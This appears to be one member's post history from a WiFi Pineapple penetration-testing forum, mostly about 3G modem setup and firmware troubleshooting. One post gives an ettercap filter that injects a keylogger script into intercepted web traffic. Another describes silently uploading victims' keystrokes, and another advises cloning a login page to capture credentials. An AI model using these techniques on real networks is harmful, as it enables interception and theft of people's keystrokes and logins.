Everything posted by Vulture

  1. Great stuff Mr. Protocol, thanks for posting.
  2. Sebkinne, would it be possible to get "wash" added? It is the module to reaver that reads WPS enabled APs, which would be helpful if we are to debug reaver.
  3. Have you restarted the pineapple since you made that change? I ask because that application sets the vendor and product of the USB Modem.
  4. Telot, care to expand on what you are working on? Video or written? I ask because I was thinking of doing some videos but don't want to overlap.
  5. Cody, The wifipineapple.com site contains many tutorials on getting started and basic understanding of what the pineapple is capable of. You need to connect to the GUI to "easily" start the service you are speaking of. Just go to http://172.16.42.1/pineapple/ and start your service. I would also recommend upgrading to the 1.1.1 firmware found in a sticky on the forum. With the terminal you can review some of the logs, such as the DNSSpoof log and the URLSnarf logs found in /www/pineapple/logs/. A mac will be no different than any other device really, the part that changes is when you are trying to share the internet connection from your PC through the pineapple to clients that connect. Which is not needed for just basic testing and learning how to use the device. I would also recommend installing BackTrack using a virtualization tool like VirtualBox or Parallels.
  6. Whistle Master, I think this is going to be one of my favorite plugins by you. I do have some issues with displaying the clients, however it doesn't appear to be a problem with generating the data into the $dumpPath however on line 33 of site_survey_data.php it appears the cat statement is generating a null .tmp file (I have confirmed clients and APs are in the .csv file) so the line 34 command is running against a null data set.
  7. You are correct in the statement that echo will just state whatever you type after it, however you are then using the > character to force the echo statement into the file /proc/sys/net/ipv4/ip_forward. Linux reviews the /proc/sys/net/ipv4/ip_forward file to determine if forwarding of the internet interface should be allowed. When set to 1 then you will not only receive internet on the pineapple but also on any clients. When set to 0 then only the pineapple will have internet, no clients will.
  8. After you ran it manually did you see anything in the logs about a connection? If you ls /dev/ttyUSB* do you get anything in return? Also, please verify that your lsusb is not showing a different value than "12d1:1001" for the modem. I have seen them change product codes occasionally depending on the device being removed and re-inserted. Also, when you ran the 3g.sh script manually it should have at least said searching for modem, then printed the "12d1:1001" string, or perhaps something else was printed?
  9. Deathstormer, can you execute the 3G script? It almost looks like it isn't detecting your device as one of the modem choices, notice nothing in your logs after the searching for modem part. Looking online, the modswitch error may not be an issue.
  10. Death stormer, can you run the following from SSH and provide the outputs?

      lsusb
      /www/pineapple/3g/3g.sh
      ls /dev/ttyUSB*
      logread (only the info about the connection)
  11. From command line run:

      echo 1 > /proc/sys/net/ipv4/ip_forward

      That should correct your Internet sharing issue.
  12. JimJensen, That is normal, what are you seeing under the Log when that is run? Specifically anything about chat/ppp or USB. If you see anything about a device serial number, just remove it before posting for your own security. Also, please make sure that you guys have activated and confirmed these modems on windows computers prior to working with them on the pineapple. The pineapple does not support activation of the device.
  13. Guys, post your log information on when it tries to start the connection. You should see something like:

      Jan 1 00:03:55 Pineapple user.notice 3g-hotplug: Starting interface wan2 for device ttyUSB0
      Jan 1 00:04:00 Pineapple user.notice root: 3G: firewall stopped
      Jan 1 00:04:02 Pineapple daemon.notice pppd[2364]: pppd 2.4.5 started by root, uid 0
      Jan 1 00:04:04 Pineapple local2.info chat[2390]: abort on (BUSY)
      Jan 1 00:04:04 Pineapple local2.info chat[2390]: abort on (NO CARRIER)
      Jan 1 00:04:04 Pineapple local2.info chat[2390]: abort on (ERROR)
      Jan 1 00:04:04 Pineapple local2.info chat[2390]: abort on (NO DIAL TONE)
      Jan 1 00:04:04 Pineapple local2.info chat[2390]: abort on (NO ANSWER)
      Jan 1 00:04:04 Pineapple local2.info chat[2390]: abort on (DELAYED)
      Jan 1 00:04:04 Pineapple local2.info chat[2390]: report (CONNECT)

      Also issue the "ifconfig 3g-wan2" and post the info too.
  14. White hat, Look up how to create a form in HTML then have it post to a .php page that writes the data to a text file. I am guessing you got this HTML code from somewhere else or a tutorial as it has attributes that are worthless to you. Also this is just going to be a normal page right now, not a popup. If you have access to the client's login page I would just copy that then alter the data inside the <form></form> tags. There are examples of this already; look at the phishing tutorial on the wiki.
  15. Whistle Master, I am aware of your project and was hoping to work on an enhancement to it, based off of what Darren posted. My plan is to get this to work globally without the need for the templates or DNSspoof however that requires that I am able to manipulate the data that is sent to the client without totally replacing the domain. Your project has inspired my alteration, and I was combing through the module last night, if what I am doing doesn't work I will probably just shift gears and create a bunch of templates for your module.
  16. Anyone here try using ettercap filters on the pineapple itself and not via a plugged in PC? Ettercap appears to be working quite well except that my filter doesn't actually replace anything into the data stream. Here is pretty much the most generic filter:

      if (ip.proto == TCP && ip.dst != '172.16.42.44' && tcp.dst == 80 || tcp.dst == 8080) {
          if (search(DATA.data, "Accept-Encoding")) {
              replace("Accept-Encoding", "Accept-Nothing!");
          }
      }
      if (ip.proto == TCP && ip.dst != '172.16.42.44' && tcp.src == 80 || tcp.src == 8080) {
          if (search(DATA.data, "<head>")){
              replace("<head>","<head><script type="text/javascript" src="http://172.16.42.1/kl.js"></script>");
              msg("iframe injected after <head>\n");
          }
          if (search(DATA.data, "<HEAD>")){
              replace("<HEAD>","<HEAD><script type="text/javascript" src="http://172.16.42.1/kl.js"></SCRIPT>");
              msg("iframe injected after <HEAD>\n");
          }
      }

      The msgs are being triggered, but the stream sent to the client contains none of the replaced data. Also, I noticed when you enable ettercap you must issue the "echo "1" > /proc/sys/net/ipv4/ip_forward" command for ICS to still be enabled. I have tried the following adapters: wlan0, br-lan, 3g-wan2 (Internet)

      Command I am running:

      ettercap -T -i 3g-wan2 -q -F test.ef
  17. On step 3 change the line *1410:5031* to *1410:6000* and the modem should work.
  18. SSH into the device and go to /www/pineapple/3g/ and run ./3g.sh and let me know the output. Also provide the output of the "lsusb" command.
  19. Whitehat, what you are looking for doesn't really exist in that sort of ease for the most part. There is a modules menu once you upgrade the firmware. Click to show the modules and you can reference their threads on the forum under their names like "key logger". This project is still evolving so not all features are available yet. You can think of the pineapple as a light weight install of backtrack installation. So study up on man in the middle attacks with backtrack. With the pineapple you are the gateway aka the man. So everything you do in those attacks can be done with the pineapple. Not to sound preachy but if you are working to show clients how you did it you should know how the background functions, so you can defeat these types of attacks or at least detect them. For example when you are done using it for attacks you can turn it around to hunt for pineapple style devices and notify you.
  20. All but step #3 you can skip that step. Also I want to reiterate the use of a powered USB hub I believe it is now a necessity for the mc760 modems while using the micro sd slot.
  21. Correction: Out-of-the-Box will need to have the following changes made to get the MC760 working:

      1) Update to the latest firmware (1.1.1 at time of writing)

      2) Log in to the http://172.16.42.1/pineapple/ interface and go to USB and change to (You will want to follow the swap tutorial by Darren first):

         config global automount
             option from_fstab 1
             option anon_mount 1

         config global autoswap
             option from_fstab 1
             option anon_swap 1

         config mount
             option target /usb
             option device /dev/sda
             option fstype ext4
             option options rw,sync
             option enabled 1
             option enabled_fsck 0

         config mount
             option target /usb
             option device /dev/sda1
             option fstype ext4
             option options rw,sync
             option enabled 1
             option enabled_fsck 0

         config swap
             option device /dev/sda2
             option enabled 1

      3) Go to the 3G menu and replace your "Mobile Broadband Connection" with:

         #!/bin/sh
         # ---------------------------------------------------------
         # 3G Connection Script for WiFi Pineapple. "Does the thing"
         #
         # Version: 2012-02-17
         # Supports:
         #
         # ZTE MF591 (T-Mobile) -dkitchen
         # Novatel MC760 (Virgin) -dkitchen
         # Novatel MC760 (Ting) -dkitchen
         #
         # Updated: wifipineapple.com
         # ---------------------------------------------------------

         # -----------------------------------------------------------
         # Configure /etc/ppp/options with hard-coded working settings
         # -----------------------------------------------------------
         echo "
         logfile /dev/null
         noaccomp
         nopcomp
         nocrtscts
         lock
         maxfail 0" > /etc/ppp/options

         *1410:6002* | *1410:5031*)
             echo "Novatel MC760 (Virgin Mobile) detected. Attempting mode switch"
             uci delete network.wan2
             uci set network.wan2=interface
             uci set network.wan2.ifname=ppp0
             uci set network.wan2.proto=3g
             uci set network.wan2.service=cdma
             uci set network.wan2.device=/dev/ttyUSB0
             uci set network.wan2.username=internet
             uci set network.wan2.password=internet
             uci set network.wan2.defaultroute=1
             uci set network.wan2.ppp_redial=persist
             uci set network.wan2.peerdns=0
             uci set network.wan2.dns=8.8.8.8
             uci set network.wan2.keepalive=1
             uci set network.wan2.pppd_options=debug
             uci set network.wan2.pppd_options=noauth
             uci commit network
             usb_modeswitch -v 1410 -p 5031 -V 1410 -P 6002 -M 5553424312345678000000000000061b000000020000000000000000000000 -n 1 -s 20
             sleep 10; rmmod usbserial
             sleep 3; insmod usbserial vendor=0x1410 product=0x6002
             sleep 5; /etc/init.d/firewall disable; /etc/init.d/firewall stop
             logger "3G: firewall stopped"
             iptables -t nat -A POSTROUTING -s 172.16.42.0/24 -o 3g-wan2 -j MASQUERADE
             iptables -A FORWARD -s 172.16.42.0/24 -o 3g-wan2 -j ACCEPT
             iptables -A FORWARD -d 172.16.42.0/24 -m state --state ESTABLISHED,RELATED -i 3g-wan2 -j ACCEPT
             ;;
         esac

      4) Then go to the Jobs menu and remove "/www/pineapple/3g/3g.sh" from the "Execute on Boot:" section.

      5) Reboot the device under the Advanced menu and wait 5 minutes.

      All this is corrected on the most recent code.
  22. Darren, Didn't even think about that, genius.... Please correct any of the following if this was not your intention. Whistle Master, I think Darren is alluding to having a JavaScript function that is loaded on every page (would have to be an ettercap filter) the script would be listening for keys to be pressed via jQuery's http://api.jquery.com/keypress/ function since keylogger already uses the jQuery library, then have it make a call back to the server and upload the data via a simple php script. This would actually be quite amazing since the user would be able to pass to their site unaffected, the DNS Spoof functionality would not need to be enabled, and the user would have little knowledge of what is going on, even if they were to be watching a Firebug console log. We also eliminate the need for SSLStrip's functionality since we are logging the strokes not the stream.
  23. You will need a micro-sd card to add into the MC760. Then I would also wait until the next firmware to really have this functionality working as Sebkinne has alluded to some features that will really make use of the extra space on the micro-sd card. If you want to get this working right now, then I would read through the information others have posted regarding the MC760 and getting the sd card mounted and adding swap to the sd card (by Darren). One issue I and others are running into with the MC760 is the power consumption, you may need an external usb hub that is powered, the key word is powered so that the device does not randomly lose connection and need to be replugged to get the 3g working again. There are many great modules being developed and I would recommend exploring them to see if they meet your needs. You should also state what your objective is. Are you phishing, "rick rolling", cracking WEP/WPA networks? The scripts that you will need will depend greatly on your goals. I have personally found this device to be an amazing little piece of hardware and for anyone who knows the basics of BackTrack or Linux in general this device can be custom tailored for your needs. Based on your 3G/Karma/URL Snarf/Save Packets you can accomplish this fairly easy without any modifications, just need that sd card.
  24. Also interested in assisting with beta testing. I can provide accurate and detailed bug reporting, not just "X is broke", and possibly a resolution.